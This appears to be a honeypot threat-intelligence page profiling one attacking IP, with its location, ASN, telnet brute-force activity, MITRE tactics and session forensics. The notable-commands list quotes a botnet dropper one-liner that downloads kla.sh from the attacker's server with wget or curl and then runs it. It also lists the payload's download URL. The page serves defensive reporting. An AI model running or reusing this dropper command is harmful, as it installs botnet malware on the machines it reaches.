← Back to feed

160.119.66.206

TAGGED MALICIOUS how we decide →
Threat Confidence
65%
Location
🇸🇨 SC
ASN
AS49870 · Alsycon B.V.
Cloud Provider
Total Events
52
Above average by volume
Agent Count
2
First / Last Seen
2026-09-14 00:11 — 2026-09-14 11:43
Attack Types
telnet:bruteforce
MITRE ATT&CK Techniques
Initial Access
Credential Access
Discovery
Command and Control
External Corroboration
DShield Top Attackers
Reported 2026-09-14 06:01
dshield:top_attacker
Session Forensics
malware_dropper ×4
Sessions
4 (4 with login)
Avg Depth Score
1.0
Commands Executed
18
Files Downloaded
12
Notable Commands
  • enable
  • linuxshell
  • linuxshell
  • system
  • system
  • sh
  • ls /home; /bin/busybox BOTNET
  • cd /tmp 2>/dev/null || cd /var 2>/dev/null || cd /dev/shm 2>/dev/null || cd /run 2>/dev/null || cd /root 2>/dev/null || cd /;rm -f kla.sh;wget -O kla.sh http://160.119.66.206/bins/kla.sh 2>/dev/null||busybox wget -O kla.sh http://160.119.66.206/bins/kla.sh 2>/dev/null||curl -sLo kla.sh http://160.119.66.206/bins/kla.sh 2>/dev/null;chmod 777 kla.sh;sh kla.sh telnet&
Download URLs
  • http://160.119.66.206/bins/kla.sh
Evidence Timeline
Malware Dropper 8c69cd1c5780 w4m_singapore_01 · 2026-09-14 11:43
8 3 1 100%
Loading events...
Malware Dropper f0f18b4a7164 w4m_singapore_01 · 2026-09-14 11:43
1 3 1 100%
Loading events...
Malware Dropper f7c94608aec7 newark_01 · 2026-09-14 00:11
8 3 1 100%
Loading events...
Malware Dropper 4e8fa5bb8035 newark_01 · 2026-09-14 00:11
1 3 1 100%
Loading events...
{# Cloudflare Web Analytics — cookieless, public pages only. The context processor withholds the token from authenticated requests. #}